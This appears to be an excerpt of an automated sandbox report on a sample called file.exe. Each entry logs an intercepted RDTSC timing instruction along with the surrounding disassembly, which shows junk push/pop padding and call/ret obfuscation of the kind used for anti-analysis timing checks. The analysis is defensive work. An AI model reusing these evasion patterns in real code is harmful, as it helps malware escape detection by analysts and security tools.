                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D2CAB second address: 4D2CC9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA49D1B33D2h 0x00000008 jmp 00007FA49D1B33CCh 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jg 00007FA49D1B33C6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D5A40 second address: 4D5A6D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FA49CDAB580h 0x0000000c jmp 00007FA49CDAB585h 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DAAAF second address: 4DAABE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49D1B33CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DAF33 second address: 4DAF3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DAF3B second address: 4DAF4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49D1B33CAh 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB201 second address: 4DB233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA49CDAB578h 0x0000000a push esi 0x0000000b pop esi 0x0000000c ja 00007FA49CDAB583h 0x00000012 jmp 00007FA49CDAB57Bh 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB233 second address: 4DB247 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FA49D1B33C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007FA49D1B33CCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB247 second address: 4DB24F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB24F second address: 4DB253 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE6A6 second address: 4DE6B0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE6B0 second address: 4DE6CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA49D1B33D6h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE6CA second address: 4DE6DA instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA49CDAB576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE6DA second address: 4DE6EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA49D1B33CBh 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DDE11 second address: 4DDE35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FA49CDAB576h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FA49CDAB586h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DDE35 second address: 4DDE3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DDE3A second address: 4DDE69 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA49CDAB57Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop edx 0x0000000f jnc 00007FA49CDAB582h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DDE69 second address: 4DDE6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE0F6 second address: 4DE102 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE102 second address: 4DE106 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE106 second address: 4DE10C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E2B1F second address: 4E2B23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E2DD6 second address: 4E2DDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E2F44 second address: 4E2F4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A353 second address: 48A358 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A358 second address: 48A35E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A35E second address: 48A362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A362 second address: 48A366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A366 second address: 48A3E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FA49CDAB57Ah 0x0000000e nop 0x0000000f mov dh, bh 0x00000011 mov ebx, dword ptr [ebp+1247B4CFh] 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007FA49CDAB578h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 0000001Bh 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 add eax, ebx 0x00000033 push 00000000h 0x00000035 push edx 0x00000036 call 00007FA49CDAB578h 0x0000003b pop edx 0x0000003c mov dword ptr [esp+04h], edx 0x00000040 add dword ptr [esp+04h], 0000001Bh 0x00000048 inc edx 0x00000049 push edx 0x0000004a ret 0x0000004b pop edx 0x0000004c ret 0x0000004d cld 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007FA49CDAB587h 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A3E5 second address: 48A453 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FA49D1B33C8h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D26CBh], ecx 0x0000002d push 00000004h 0x0000002f push 00000000h 0x00000031 push ebp 0x00000032 call 00007FA49D1B33C8h 0x00000037 pop ebp 0x00000038 mov dword ptr [esp+04h], ebp 0x0000003c add dword ptr [esp+04h], 00000019h 0x00000044 inc ebp 0x00000045 push ebp 0x00000046 ret 0x00000047 pop ebp 0x00000048 ret 0x00000049 sub dword ptr [ebp+122D34DEh], ecx 0x0000004f nop 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 jmp 00007FA49D1B33CFh 0x00000058 push ecx 0x00000059 pop ecx 0x0000005a popad 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A453 second address: 48A465 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jng 00007FA49CDAB576h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A465 second address: 48A469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E31D5 second address: 4E31D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E3B8F second address: 4E3B93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E3B93 second address: 4E3BA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FA49CDAB576h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E3BA1 second address: 4E3BA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E61D5 second address: 4E61E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA49CDAB57Ah 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E61E7 second address: 4E6204 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA49D1B33C8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007FA49D1B33CFh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6204 second address: 4E6208 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6208 second address: 4E620E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED1B3 second address: 4ED1B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED1B7 second address: 4ED1D7 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA49D1B33C6h 0x00000008 jmp 00007FA49D1B33D1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED1D7 second address: 4ED1EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA49CDAB57Eh 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB2D8 second address: 4EB2EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA49D1B33D2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB449 second address: 4EB44D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB44D second address: 4EB453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB453 second address: 4EB477 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49CDAB584h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 push ecx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB8C2 second address: 4EB8D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007FA49D1B33C6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC393 second address: 4EC39E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA49CDAB576h 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ECC8D second address: 4ECC93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ECC93 second address: 4ECC97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ECC97 second address: 4ECC9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ECC9D second address: 4ECCA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ECCA1 second address: 4ECCB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49D1B33CCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F1918 second address: 4F1922 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA49CDAB57Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F1922 second address: 4F1936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FA49D1B33C8h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F1936 second address: 4F1940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F5481 second address: 4F5488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F465F second address: 4F4663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F490F second address: 4F4913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F4A84 second address: 4F4A88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F4A88 second address: 4F4A9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jg 00007FA49D1B33C6h 0x0000000f pop eax 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F4A9E second address: 4F4AAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F4AAE second address: 4F4AB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F4C1C second address: 4F4C23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F4D28 second address: 4F4D3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA49D1B33CFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F5065 second address: 4F506D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FBC36 second address: 4FBC50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49D1B33D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0A1 second address: 4FC0D4 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA49CDAB588h 0x00000008 jmp 00007FA49CDAB580h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 jmp 00007FA49CDAB586h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC257 second address: 4FC267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 jo 00007FA49D1B33E3h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC267 second address: 4FC27A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA49CDAB57Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC39D second address: 4FC3BB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pop eax 0x00000007 pop ebx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA49D1B33D2h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC7D7 second address: 4FC7DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC7DB second address: 4FC801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FA49D1B33C8h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FA49D1B33D4h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC801 second address: 4FC810 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA49CDAB576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC810 second address: 4FC81C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 push esi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5017D6 second address: 5017DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5017DB second address: 50181C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007FA49D1B33CFh 0x0000000f jmp 00007FA49D1B33CEh 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 jmp 00007FA49D1B33D3h 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503B24 second address: 503B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA49CDAB576h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5051E4 second address: 505226 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FA49D1B33D8h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FA49D1B33D0h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FA49D1B33CEh 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5083A9 second address: 5083AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5083AD second address: 5083BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jne 00007FA49D1B33C6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5083BD second address: 5083CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49CDAB57Bh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507E36 second address: 507E42 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA49D1B33C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507E42 second address: 507E4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FA49CDAB576h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507E4C second address: 507E50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507FAD second address: 507FC3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA49CDAB576h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507FC3 second address: 507FED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA49D1B33D2h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FA49D1B33CEh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507FED second address: 507FF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 509A91 second address: 509A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51C52F second address: 51C537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51C537 second address: 51C55E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ecx 0x00000007 push edi 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edi 0x0000000b popad 0x0000000c push edx 0x0000000d push ecx 0x0000000e jmp 00007FA49D1B33D5h 0x00000013 pop ecx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
